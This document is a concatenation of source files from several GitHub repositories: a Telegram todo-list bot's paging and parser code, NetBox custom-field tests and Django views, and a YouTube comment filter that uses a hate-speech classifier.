{
"source": "joshcoales/todolistbot",
"score": 3
}
#### File: todolistbot/todo_list_bot/response.py
```python
from typing import List, Optional, Dict
from telethon import Button
from telethon.tl.types import KeyboardButtonCallback
class Response:
per_page = 6
text_length_limit = 4096
def __init__(self, text: str, buttons: Optional[List[KeyboardButtonCallback]] = None):
self._text = text
self.all_buttons = buttons
self.page = 1
def prefix(self, prefix: str) -> None:
self._text = prefix + self._text
@property
def text(self) -> str:
truncated = self._text[:self.text_length_limit - 4]
if truncated != self._text:
truncated += "\n..."
return truncated
@property
def pages(self) -> Optional[int]:
if self.all_buttons is None:
return None
return ((len(self.all_buttons) - 1) // self.per_page) + 1
@property
def has_next(self) -> bool:
if self.pages == 1 or self.all_buttons is None:
return False
return self.page < self.pages
@property
def has_prev(self) -> bool:
if self.pages == 1 or self.all_buttons is None:
return False
return self.page > 1
def buttons(self) -> Optional[List[List[KeyboardButtonCallback]]]:
if self.all_buttons is None:
return None
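        # keep only the slice of buttons that belongs to the current page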
buttons = self.all_buttons[(self.page - 1) * self.per_page: self.page * self.per_page]
if self.pages == 1:
return [[b] for b in buttons]
page_buttons = [
Button.inline(
"< Prev" if self.has_prev else " ",
f"page:{self.page - 1}" if self.has_prev else f"page:{self.page}"
),
Button.inline(
"> Next" if self.has_next else " ",
f"page:{self.page + 1}" if self.has_next else f"page:{self.page}"
)
]
return [
*([b] for b in buttons),
page_buttons
]
def to_json(self) -> Dict:
return {
"text": self.text,
"all_buttons": [
{
"text": button.text,
"data": button.data.decode()
} for button in self.all_buttons
] if self.all_buttons is not None else None,
"page": self.page
}
@classmethod
def from_json(cls, data: Dict) -> 'Response':
response = Response(
data["text"],
[Button.inline(d["text"], d["data"]) for d in data["all_buttons"]] if data["all_buttons"] is not None else None
)
response.page = data["page"]
return response
```
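For context, a minimal usage sketch (not part of the original file) showing how the paging properties interact; the import path follows the file layout above and the button labels are illustrative:
```python
from telethon import Button
from todo_list_bot.response import Response

# 8 buttons with per_page = 6 gives 2 pages
buttons = [Button.inline(f"Item {i}", f"item:{i}") for i in range(8)]
response = Response("Pick an item:", buttons)

print(response.pages)      # 2
print(response.has_next)   # True while on page 1
response.page = 2
rows = response.buttons()  # two single-button rows plus a "< Prev" / " " navigation row
```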
#### File: todolistbot/todo_list_bot/todo_list.py
```python
from abc import ABC, abstractmethod
from enum import Enum
from typing import List, Optional, Dict, Tuple
from prometheus_client import Counter
list_parsed = Counter("todolistbot_parse_list_total", "Number of todo lists parsed")
sections_parsed = Counter("todolistbot_parse_section_total", "Number of todo list sections parsed")
items_parsed = Counter("todolistbot_parse_items_total", "Number of todo list items parsed")
def line_is_section(line: str) -> bool:
return line.startswith("#")
def line_is_empty(line: str) -> bool:
return line.strip() == ""
def line_is_item(line: str) -> bool:
return not line_is_empty(line) and not line_is_section(line)
# noinspection PyMethodMayBeStatic
class TodoList:
def __init__(self, path: str):
self.path = path
self.root_section = TodoSection("root", 0, None)
def parse(self) -> None:
list_parsed.inc()
with open(self.path, "r") as f:
contents = f.readlines()
self.parse_lines(contents)
def parse_lines(self, contents: List[str], current_section: Optional['TodoSection'] = None):
current_section = current_section or self.root_section
current_item = None
for line in contents:
if line_is_empty(line):
continue
if line_is_section(line):
current_section = self.parse_section(line, current_section)
current_item = None
else:
current_item = self.parse_item(line, current_section, current_item)
def parse_section(self, line: str, current_section: 'TodoSection') -> 'TodoSection':
sections_parsed.inc()
section_title = line.lstrip("#")
section_depth = len(line) - len(section_title)
section_title = section_title.strip()
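        # a deeper heading nests under the current section; otherwise walk back up
        # the tree to the nearest ancestor shallower than the new heading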
if section_depth > current_section.depth:
parent_section = current_section
else:
while section_depth <= current_section.depth:
current_section = current_section.parent_section
parent_section = current_section
return TodoSection(section_title, section_depth, parent_section)
def parse_item(self, line: str, current_section: 'TodoSection', current_item: Optional['TodoItem']) -> 'TodoItem':
items_parsed.inc()
status, line = self.parse_status(line)
item_text = line.lstrip(" -")
item_depth = len(line) - len(item_text)
item_text = item_text.strip()
if current_item is None:
parent_item = None
elif item_depth > current_item.depth:
parent_item = current_item
else:
parent_item = current_item
while item_depth <= parent_item.depth:
if parent_item.parent_item is not None:
parent_item = parent_item.parent_item
else:
parent_item = None
break
return TodoItem(status, item_text, item_depth, current_section, parent_item)
def parse_status(self, line: str) -> Tuple['TodoStatus', str]:
status = TodoStatus.TODO
for enum_status in TodoStatus:
if line.startswith(enum_status.value):
status = enum_status
line = line[len(enum_status.value):]
break
return status, line
def to_text(self, section: Optional['TodoSection'] = None) -> str:
section = section or self.root_section
max_length = 4096
text = section.to_text()
if len(text) < max_length:
return text
max_depth = 10
while len(section.to_text(max_depth)) > max_length and max_depth >= 1:
max_depth -= 1
return section.to_text(max_depth)
def save(self) -> None:
with open(self.path, "w") as f:
f.write(self.root_section.to_text())
def to_json(self) -> Dict:
return {
"path": self.path
}
@classmethod
def from_json(cls, data: Dict) -> 'TodoList':
todo = TodoList(data["path"])
todo.parse()
return todo
class TodoContainer(ABC):
def __init__(self, parent_section: Optional['TodoSection']):
self.parent_section: Optional[TodoSection] = parent_section
@property
@abstractmethod
def parent(self) -> Optional['TodoContainer']:
raise NotImplementedError
@abstractmethod
def remove(self) -> None:
raise NotImplementedError
@abstractmethod
def is_empty(self) -> bool:
raise NotImplementedError
@abstractmethod
def to_text(self, max_depth: Optional[int] = None) -> str:
raise NotImplementedError
class TodoSection(TodoContainer):
def __init__(self, title: str, depth: int, parent: Optional['TodoSection']):
super().__init__(parent)
self.title: str = title
self.depth: int = depth
self.sub_sections: List['TodoSection'] = []
if parent:
parent.sub_sections.append(self)
self.root_items: List['TodoItem'] = []
@property
def parent(self) -> Optional['TodoSection']:
return self.parent_section
def is_empty(self) -> bool:
return not self.sub_sections and not self.root_items
def remove(self) -> None:
if self.parent_section:
self.parent_section.sub_sections.remove(self)
def to_text(self, max_depth: Optional[int] = None) -> str:
lines = []
if self.depth != 0:
lines += ["#" * self.depth + " " + self.title]
if max_depth is None:
lines += [item.to_text(max_depth) for item in self.root_items]
if max_depth is None or self.depth < max_depth:
lines += [("\n" if max_depth is None else "") + section.to_text(max_depth) for section in self.sub_sections]
return "\n".join(lines)
class TodoItem(TodoContainer):
def __init__(
self,
status: 'TodoStatus',
name: str,
depth: int,
parent_section: TodoSection,
parent_item: Optional['TodoItem']
):
super().__init__(parent_section)
self.status: 'TodoStatus' = status
self.name: str = name
self.depth: int = depth
self.parent_item: Optional['TodoItem'] = parent_item
self.sub_items: List['TodoItem'] = []
if parent_item:
parent_item.sub_items.append(self)
else:
parent_section.root_items.append(self)
@property
def parent(self) -> TodoContainer:
if self.parent_item:
return self.parent_item
return self.parent_section
def is_empty(self) -> bool:
return not self.sub_items
def remove(self) -> None:
if self.parent_item:
self.parent_item.sub_items.remove(self)
else:
self.parent_section.root_items.remove(self)
def to_text(self, max_depth: Optional[int] = None) -> str:
lines = [self.status.value + ("- " * self.depth)[:self.depth] + self.name]
if not max_depth or (self.parent_item.depth + self.depth) < max_depth:
lines += [item.to_text(max_depth) for item in self.sub_items]
return "\n".join(lines)
class TodoStatus(Enum):
COMPLETE = "DONE"
IN_PROGRESS = "INP"
TODO = ""
```
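A short sketch (not in the original module) of how the parser turns markdown-style lines into nested sections and items; `parse_lines` is called directly so no file on disk is needed:
```python
from todo_list_bot.todo_list import TodoList

todo = TodoList("example_list.md")  # the path is only read when parse()/save() are used
todo.parse_lines([
    "# Chores",
    "DONE take out bins",
    "INP clean kitchen",
    "- wipe counters",
    "## Garden",
    "mow lawn",
])
print(todo.root_section.to_text())
```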
{
"source": "joshcorr/netbox",
"score": 2
}
#### File: extras/tests/test_customfields.py
```python
from datetime import date
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from dcim.models import Site
from extras.constants import CF_TYPE_TEXT, CF_TYPE_INTEGER, CF_TYPE_BOOLEAN, CF_TYPE_DATE, CF_TYPE_SELECT, CF_TYPE_URL
from extras.models import CustomField, CustomFieldValue, CustomFieldChoice
from utilities.testing import APITestCase
from virtualization.models import VirtualMachine
class CustomFieldTest(TestCase):
def setUp(self):
Site.objects.bulk_create([
Site(name='Site A', slug='site-a'),
Site(name='Site B', slug='site-b'),
Site(name='Site C', slug='site-c'),
])
def test_simple_fields(self):
DATA = (
{'field_type': CF_TYPE_TEXT, 'field_value': 'Foobar!', 'empty_value': ''},
{'field_type': CF_TYPE_INTEGER, 'field_value': 0, 'empty_value': None},
{'field_type': CF_TYPE_INTEGER, 'field_value': 42, 'empty_value': None},
{'field_type': CF_TYPE_BOOLEAN, 'field_value': True, 'empty_value': None},
{'field_type': CF_TYPE_BOOLEAN, 'field_value': False, 'empty_value': None},
{'field_type': CF_TYPE_DATE, 'field_value': date(2016, 6, 23), 'empty_value': None},
{'field_type': CF_TYPE_URL, 'field_value': 'http://example.com/', 'empty_value': ''},
)
obj_type = ContentType.objects.get_for_model(Site)
for data in DATA:
# Create a custom field
cf = CustomField(type=data['field_type'], name='my_field', required=False)
cf.save()
cf.obj_type.set([obj_type])
cf.save()
# Assign a value to the first Site
site = Site.objects.first()
cfv = CustomFieldValue(field=cf, obj_type=obj_type, obj_id=site.id)
cfv.value = data['field_value']
cfv.save()
# Retrieve the stored value
cfv = CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).first()
self.assertEqual(cfv.value, data['field_value'])
# Delete the stored value
cfv.value = data['empty_value']
cfv.save()
self.assertEqual(CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).count(), 0)
# Delete the custom field
cf.delete()
def test_select_field(self):
obj_type = ContentType.objects.get_for_model(Site)
# Create a custom field
cf = CustomField(type=CF_TYPE_SELECT, name='my_field', required=False)
cf.save()
cf.obj_type.set([obj_type])
cf.save()
# Create some choices for the field
CustomFieldChoice.objects.bulk_create([
CustomFieldChoice(field=cf, value='Option A'),
CustomFieldChoice(field=cf, value='Option B'),
CustomFieldChoice(field=cf, value='Option C'),
])
# Assign a value to the first Site
site = Site.objects.first()
cfv = CustomFieldValue(field=cf, obj_type=obj_type, obj_id=site.id)
cfv.value = cf.choices.first()
cfv.save()
# Retrieve the stored value
cfv = CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).first()
self.assertEqual(str(cfv.value), 'Option A')
# Delete the stored value
cfv.value = None
cfv.save()
self.assertEqual(CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).count(), 0)
# Delete the custom field
cf.delete()
class CustomFieldAPITest(APITestCase):
def setUp(self):
super().setUp()
content_type = ContentType.objects.get_for_model(Site)
# Text custom field
self.cf_text = CustomField(type=CF_TYPE_TEXT, name='magic_word')
self.cf_text.save()
self.cf_text.obj_type.set([content_type])
self.cf_text.save()
# Integer custom field
self.cf_integer = CustomField(type=CF_TYPE_INTEGER, name='magic_number')
self.cf_integer.save()
self.cf_integer.obj_type.set([content_type])
self.cf_integer.save()
# Boolean custom field
self.cf_boolean = CustomField(type=CF_TYPE_BOOLEAN, name='is_magic')
self.cf_boolean.save()
self.cf_boolean.obj_type.set([content_type])
self.cf_boolean.save()
# Date custom field
self.cf_date = CustomField(type=CF_TYPE_DATE, name='magic_date')
self.cf_date.save()
self.cf_date.obj_type.set([content_type])
self.cf_date.save()
# URL custom field
self.cf_url = CustomField(type=CF_TYPE_URL, name='magic_url')
self.cf_url.save()
self.cf_url.obj_type.set([content_type])
self.cf_url.save()
# Select custom field
self.cf_select = CustomField(type=CF_TYPE_SELECT, name='magic_choice')
self.cf_select.save()
self.cf_select.obj_type.set([content_type])
self.cf_select.save()
self.cf_select_choice1 = CustomFieldChoice(field=self.cf_select, value='Foo')
self.cf_select_choice1.save()
self.cf_select_choice2 = CustomFieldChoice(field=self.cf_select, value='Bar')
self.cf_select_choice2.save()
self.cf_select_choice3 = CustomFieldChoice(field=self.cf_select, value='Baz')
self.cf_select_choice3.save()
self.site = Site.objects.create(name='Test Site 1', slug='test-site-1')
def test_get_obj_without_custom_fields(self):
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.site.name)
self.assertEqual(response.data['custom_fields'], {
'magic_word': None,
'magic_number': None,
'is_magic': None,
'magic_date': None,
'magic_url': None,
'magic_choice': None,
})
def test_get_obj_with_custom_fields(self):
CUSTOM_FIELD_VALUES = [
(self.cf_text, 'Test string'),
(self.cf_integer, 1234),
(self.cf_boolean, True),
(self.cf_date, date(2016, 6, 23)),
(self.cf_url, 'http://example.com/'),
(self.cf_select, self.cf_select_choice1.pk),
]
for field, value in CUSTOM_FIELD_VALUES:
cfv = CustomFieldValue(field=field, obj=self.site)
cfv.value = value
cfv.save()
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.site.name)
self.assertEqual(response.data['custom_fields'].get('magic_word'), CUSTOM_FIELD_VALUES[0][1])
self.assertEqual(response.data['custom_fields'].get('magic_number'), CUSTOM_FIELD_VALUES[1][1])
self.assertEqual(response.data['custom_fields'].get('is_magic'), CUSTOM_FIELD_VALUES[2][1])
self.assertEqual(response.data['custom_fields'].get('magic_date'), CUSTOM_FIELD_VALUES[3][1])
self.assertEqual(response.data['custom_fields'].get('magic_url'), CUSTOM_FIELD_VALUES[4][1])
self.assertEqual(response.data['custom_fields'].get('magic_choice'), {
'value': self.cf_select_choice1.pk, 'label': 'Foo'
})
def test_set_custom_field_text(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_word': 'Foo bar baz',
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_word'), data['custom_fields']['magic_word'])
cfv = self.site.custom_field_values.get(field=self.cf_text)
self.assertEqual(cfv.value, data['custom_fields']['magic_word'])
def test_set_custom_field_integer(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_number': 42,
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_number'), data['custom_fields']['magic_number'])
cfv = self.site.custom_field_values.get(field=self.cf_integer)
self.assertEqual(cfv.value, data['custom_fields']['magic_number'])
def test_set_custom_field_boolean(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'is_magic': 0,
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('is_magic'), data['custom_fields']['is_magic'])
cfv = self.site.custom_field_values.get(field=self.cf_boolean)
self.assertEqual(cfv.value, data['custom_fields']['is_magic'])
def test_set_custom_field_date(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_date': '2017-04-25',
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_date'), data['custom_fields']['magic_date'])
cfv = self.site.custom_field_values.get(field=self.cf_date)
self.assertEqual(cfv.value.isoformat(), data['custom_fields']['magic_date'])
def test_set_custom_field_url(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_url': 'http://example.com/2/',
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_url'), data['custom_fields']['magic_url'])
cfv = self.site.custom_field_values.get(field=self.cf_url)
self.assertEqual(cfv.value, data['custom_fields']['magic_url'])
def test_set_custom_field_select(self):
data = {
'name': 'Test Site 1',
'slug': 'test-site-1',
'custom_fields': {
'magic_choice': self.cf_select_choice2.pk,
}
}
url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk})
response = self.client.put(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(response.data['custom_fields'].get('magic_choice'), data['custom_fields']['magic_choice'])
cfv = self.site.custom_field_values.get(field=self.cf_select)
self.assertEqual(cfv.value.pk, data['custom_fields']['magic_choice'])
def test_set_custom_field_defaults(self):
"""
Create a new object with no custom field data. Custom field values should be created using the custom fields'
default values.
"""
CUSTOM_FIELD_DEFAULTS = {
'magic_word': 'foobar',
'magic_number': '123',
'is_magic': 'true',
'magic_date': '2019-12-13',
'magic_url': 'http://example.com/',
'magic_choice': self.cf_select_choice1.value,
}
# Update CustomFields to set default values
for field_name, default_value in CUSTOM_FIELD_DEFAULTS.items():
CustomField.objects.filter(name=field_name).update(default=default_value)
data = {
'name': 'Test Site X',
'slug': 'test-site-x',
}
url = reverse('dcim-api:site-list')
response = self.client.post(url, data, format='json', **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(response.data['custom_fields']['magic_word'], CUSTOM_FIELD_DEFAULTS['magic_word'])
self.assertEqual(response.data['custom_fields']['magic_number'], str(CUSTOM_FIELD_DEFAULTS['magic_number']))
self.assertEqual(response.data['custom_fields']['is_magic'], bool(CUSTOM_FIELD_DEFAULTS['is_magic']))
self.assertEqual(response.data['custom_fields']['magic_date'], CUSTOM_FIELD_DEFAULTS['magic_date'])
self.assertEqual(response.data['custom_fields']['magic_url'], CUSTOM_FIELD_DEFAULTS['magic_url'])
self.assertEqual(response.data['custom_fields']['magic_choice'], self.cf_select_choice1.pk)
class CustomFieldChoiceAPITest(APITestCase):
def setUp(self):
super().setUp()
vm_content_type = ContentType.objects.get_for_model(VirtualMachine)
self.cf_1 = CustomField.objects.create(name="cf_1", type=CF_TYPE_SELECT)
self.cf_2 = CustomField.objects.create(name="cf_2", type=CF_TYPE_SELECT)
self.cf_choice_1 = CustomFieldChoice.objects.create(field=self.cf_1, value="cf_field_1", weight=100)
self.cf_choice_2 = CustomFieldChoice.objects.create(field=self.cf_1, value="cf_field_2", weight=50)
self.cf_choice_3 = CustomFieldChoice.objects.create(field=self.cf_2, value="cf_field_3", weight=10)
def test_list_cfc(self):
url = reverse('extras-api:custom-field-choice-list')
response = self.client.get(url, **self.header)
self.assertEqual(len(response.data), 2)
self.assertEqual(len(response.data[self.cf_1.name]), 2)
self.assertEqual(len(response.data[self.cf_2.name]), 1)
self.assertTrue(self.cf_choice_1.value in response.data[self.cf_1.name])
self.assertTrue(self.cf_choice_2.value in response.data[self.cf_1.name])
self.assertTrue(self.cf_choice_3.value in response.data[self.cf_2.name])
self.assertEqual(self.cf_choice_1.pk, response.data[self.cf_1.name][self.cf_choice_1.value])
self.assertEqual(self.cf_choice_2.pk, response.data[self.cf_1.name][self.cf_choice_2.value])
self.assertEqual(self.cf_choice_3.pk, response.data[self.cf_2.name][self.cf_choice_3.value])
```
#### File: netbox/extras/views.py
```python
from django import template
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib.contenttypes.models import ContentType
from django.db.models import Count, Q
from django.http import Http404, HttpResponseForbidden
from django.shortcuts import get_object_or_404, redirect, render
from django.utils.safestring import mark_safe
from django.views.generic import View
from django_tables2 import RequestConfig
from utilities.forms import ConfirmationForm
from utilities.paginator import EnhancedPaginator
from utilities.views import BulkDeleteView, BulkEditView, ObjectDeleteView, ObjectEditView, ObjectListView
from . import filters, forms
from .models import ConfigContext, ImageAttachment, ObjectChange, ReportResult, Tag, TaggedItem
from .reports import get_report, get_reports
from .scripts import get_scripts, run_script
from .tables import ConfigContextTable, ObjectChangeTable, TagTable, TaggedItemTable
#
# Tags
#
class TagListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'extras.view_tag'
queryset = Tag.objects.annotate(
items=Count('extras_taggeditem_items', distinct=True)
).order_by(
'name'
)
filter = filters.TagFilter
filter_form = forms.TagFilterForm
table = TagTable
template_name = 'extras/tag_list.html'
class TagView(View):
def get(self, request, slug):
tag = get_object_or_404(Tag, slug=slug)
tagged_items = TaggedItem.objects.filter(
tag=tag
).prefetch_related(
'content_type', 'content_object'
)
# Generate a table of all items tagged with this Tag
items_table = TaggedItemTable(tagged_items)
paginate = {
'paginator_class': EnhancedPaginator,
'per_page': request.GET.get('per_page', settings.PAGINATE_COUNT)
}
RequestConfig(request, paginate).configure(items_table)
return render(request, 'extras/tag.html', {
'tag': tag,
'items_count': tagged_items.count(),
'items_table': items_table,
})
class TagEditView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'extras.change_tag'
model = Tag
model_form = forms.TagForm
default_return_url = 'extras:tag_list'
template_name = 'extras/tag_edit.html'
class TagDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'extras.delete_tag'
model = Tag
default_return_url = 'extras:tag_list'
class TagBulkEditView(PermissionRequiredMixin, BulkEditView):
permission_required = 'extras.change_tag'
queryset = Tag.objects.annotate(
items=Count('extras_taggeditem_items', distinct=True)
).order_by(
'name'
)
# filter = filters.ProviderFilter
table = TagTable
form = forms.TagBulkEditForm
    default_return_url = 'extras:tag_list'
class TagBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'extras.delete_tag'
queryset = Tag.objects.annotate(
items=Count('extras_taggeditem_items')
).order_by(
'name'
)
table = TagTable
default_return_url = 'extras:tag_list'
#
# Config contexts
#
class ConfigContextListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'extras.view_configcontext'
queryset = ConfigContext.objects.all()
filter = filters.ConfigContextFilter
filter_form = forms.ConfigContextFilterForm
table = ConfigContextTable
template_name = 'extras/configcontext_list.html'
class ConfigContextView(PermissionRequiredMixin, View):
permission_required = 'extras.view_configcontext'
def get(self, request, pk):
configcontext = get_object_or_404(ConfigContext, pk=pk)
return render(request, 'extras/configcontext.html', {
'configcontext': configcontext,
})
class ConfigContextCreateView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'extras.add_configcontext'
model = ConfigContext
model_form = forms.ConfigContextForm
default_return_url = 'extras:configcontext_list'
template_name = 'extras/configcontext_edit.html'
class ConfigContextEditView(ConfigContextCreateView):
permission_required = 'extras.change_configcontext'
class ConfigContextBulkEditView(PermissionRequiredMixin, BulkEditView):
permission_required = 'extras.change_configcontext'
queryset = ConfigContext.objects.all()
filter = filters.ConfigContextFilter
table = ConfigContextTable
form = forms.ConfigContextBulkEditForm
default_return_url = 'extras:configcontext_list'
class ConfigContextDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'extras.delete_configcontext'
model = ConfigContext
default_return_url = 'extras:configcontext_list'
class ConfigContextBulkDeleteView(PermissionRequiredMixin, BulkDeleteView):
permission_required = 'extras.delete_configcontext'
queryset = ConfigContext.objects.all()
table = ConfigContextTable
default_return_url = 'extras:configcontext_list'
class ObjectConfigContextView(View):
object_class = None
base_template = None
def get(self, request, pk):
obj = get_object_or_404(self.object_class, pk=pk)
source_contexts = ConfigContext.objects.get_for_object(obj)
model_name = self.object_class._meta.model_name
return render(request, 'extras/object_configcontext.html', {
model_name: obj,
'obj': obj,
'rendered_context': obj.get_config_context(),
'source_contexts': source_contexts,
'base_template': self.base_template,
'active_tab': 'config-context',
})
#
# Change logging
#
class ObjectChangeListView(PermissionRequiredMixin, ObjectListView):
permission_required = 'extras.view_objectchange'
queryset = ObjectChange.objects.prefetch_related('user', 'changed_object_type')
filter = filters.ObjectChangeFilter
filter_form = forms.ObjectChangeFilterForm
table = ObjectChangeTable
template_name = 'extras/objectchange_list.html'
class ObjectChangeView(PermissionRequiredMixin, View):
permission_required = 'extras.view_objectchange'
def get(self, request, pk):
objectchange = get_object_or_404(ObjectChange, pk=pk)
related_changes = ObjectChange.objects.filter(request_id=objectchange.request_id).exclude(pk=objectchange.pk)
related_changes_table = ObjectChangeTable(
data=related_changes[:50],
orderable=False
)
return render(request, 'extras/objectchange.html', {
'objectchange': objectchange,
'related_changes_table': related_changes_table,
'related_changes_count': related_changes.count()
})
class ObjectChangeLogView(View):
"""
Present a history of changes made to a particular object.
"""
def get(self, request, model, **kwargs):
        # Get object by model and kwargs (e.g. slug='foo')
obj = get_object_or_404(model, **kwargs)
# Gather all changes for this object (and its related objects)
content_type = ContentType.objects.get_for_model(model)
objectchanges = ObjectChange.objects.prefetch_related(
'user', 'changed_object_type'
).filter(
Q(changed_object_type=content_type, changed_object_id=obj.pk) |
Q(related_object_type=content_type, related_object_id=obj.pk)
)
objectchanges_table = ObjectChangeTable(
data=objectchanges,
orderable=False
)
# Apply the request context
paginate = {
'paginator_class': EnhancedPaginator,
'per_page': request.GET.get('per_page', settings.PAGINATE_COUNT)
}
RequestConfig(request, paginate).configure(objectchanges_table)
# Check whether a header template exists for this model
base_template = '{}/{}.html'.format(model._meta.app_label, model._meta.model_name)
try:
template.loader.get_template(base_template)
object_var = model._meta.model_name
except template.TemplateDoesNotExist:
base_template = '_base.html'
object_var = 'obj'
return render(request, 'extras/object_changelog.html', {
object_var: obj,
'table': objectchanges_table,
'base_template': base_template,
'active_tab': 'changelog',
})
#
# Image attachments
#
class ImageAttachmentEditView(PermissionRequiredMixin, ObjectEditView):
permission_required = 'extras.change_imageattachment'
model = ImageAttachment
model_form = forms.ImageAttachmentForm
def alter_obj(self, imageattachment, request, args, kwargs):
if not imageattachment.pk:
# Assign the parent object based on URL kwargs
model = kwargs.get('model')
imageattachment.parent = get_object_or_404(model, pk=kwargs['object_id'])
return imageattachment
def get_return_url(self, request, imageattachment):
return imageattachment.parent.get_absolute_url()
class ImageAttachmentDeleteView(PermissionRequiredMixin, ObjectDeleteView):
permission_required = 'extras.delete_imageattachment'
model = ImageAttachment
def get_return_url(self, request, imageattachment):
return imageattachment.parent.get_absolute_url()
#
# Reports
#
class ReportListView(PermissionRequiredMixin, View):
"""
Retrieve all of the available reports from disk and the recorded ReportResult (if any) for each.
"""
permission_required = 'extras.view_reportresult'
def get(self, request):
reports = get_reports()
results = {r.report: r for r in ReportResult.objects.all()}
ret = []
for module, report_list in reports:
module_reports = []
for report in report_list:
report.result = results.get(report.full_name, None)
module_reports.append(report)
ret.append((module, module_reports))
return render(request, 'extras/report_list.html', {
'reports': ret,
})
class ReportView(PermissionRequiredMixin, View):
"""
Display a single Report and its associated ReportResult (if any).
"""
permission_required = 'extras.view_reportresult'
def get(self, request, name):
# Retrieve the Report by "<module>.<report>"
module_name, report_name = name.split('.')
report = get_report(module_name, report_name)
if report is None:
raise Http404
# Attach the ReportResult (if any)
report.result = ReportResult.objects.filter(report=report.full_name).first()
return render(request, 'extras/report.html', {
'report': report,
'run_form': ConfirmationForm(),
})
class ReportRunView(PermissionRequiredMixin, View):
"""
Run a Report and record a new ReportResult.
"""
permission_required = 'extras.add_reportresult'
def post(self, request, name):
# Retrieve the Report by "<module>.<report>"
module_name, report_name = name.split('.')
report = get_report(module_name, report_name)
if report is None:
raise Http404
form = ConfirmationForm(request.POST)
if form.is_valid():
# Run the Report. A new ReportResult is created.
report.run()
result = 'failed' if report.failed else 'passed'
msg = "Ran report {} ({})".format(report.full_name, result)
messages.success(request, mark_safe(msg))
return redirect('extras:report', name=report.full_name)
#
# Scripts
#
class ScriptListView(PermissionRequiredMixin, View):
permission_required = 'extras.view_script'
def get(self, request):
return render(request, 'extras/script_list.html', {
'scripts': get_scripts(),
})
class ScriptView(PermissionRequiredMixin, View):
permission_required = 'extras.view_script'
def _get_script(self, module, name):
scripts = get_scripts()
try:
return scripts[module][name]()
except KeyError:
raise Http404
def get(self, request, module, name):
script = self._get_script(module, name)
form = script.as_form(initial=request.GET)
return render(request, 'extras/script.html', {
'module': module,
'script': script,
'form': form,
})
def post(self, request, module, name):
# Permissions check
if not request.user.has_perm('extras.run_script'):
return HttpResponseForbidden()
script = self._get_script(module, name)
form = script.as_form(request.POST, request.FILES)
output = None
execution_time = None
if form.is_valid():
commit = form.cleaned_data.pop('_commit')
output, execution_time = run_script(script, form.cleaned_data, request, commit)
return render(request, 'extras/script.html', {
'module': module,
'script': script,
'form': form,
'output': output,
'execution_time': execution_time,
})
```
{
"source": "joshcruz428/Deep-YouTube-Comment-Text-Generator",
"score": 3
}
#### File: joshcruz428/Deep-YouTube-Comment-Text-Generator/commentRefiner.py
```python
import json_lines
import os
from hatesonar import Sonar
# Write only comments whose vote count exceeds votes_threshold to a .txt file.
# Sonar is also used to filter out hate speech and offensive comments.
def refine_jsonl_file(path, votes_threshold=10, hate_limit=0.4, offensive_limit=0.7, general_limit=0.8):
sonar = Sonar()
name, _ = os.path.splitext(path)
refined_name = "refined_{name}.txt".format(name = name)
if os.path.exists(refined_name):
os.remove(refined_name)
refined_file = open(refined_name, mode='w')
with open(path, 'rb') as f: # opening file in binary(rb) mode
with refined_file as rf:
for item in json_lines.reader(f):
                if int(item['votes']) > votes_threshold:
text = item['text']
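                    # Sonar returns per-class confidences; indexes 0 and 1 are assumed
                    # here to be the hate-speech and offensive-language classes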
hate_confidence = sonar.ping(text=text)['classes'][0]['confidence']
offensive_confidence = sonar.ping(text=text)['classes'][1]['confidence']
if not((hate_confidence > hate_limit) or (offensive_confidence > offensive_limit)
or (hate_confidence + offensive_confidence > general_limit)):
try:
print(text, file=rf)
except:
continue
    # both files are closed automatically by their "with" blocks
```
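A hypothetical invocation (the filename is illustrative, not taken from the repository):
```python
from commentRefiner import refine_jsonl_file

# writes refined_comments.txt, keeping only sufficiently upvoted comments
# that pass the hate/offensive-language filters
refine_jsonl_file("comments.jsonl", votes_threshold=10)
```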
{
"source": "JoshCullinan/CCLDP",
"score": 3
}
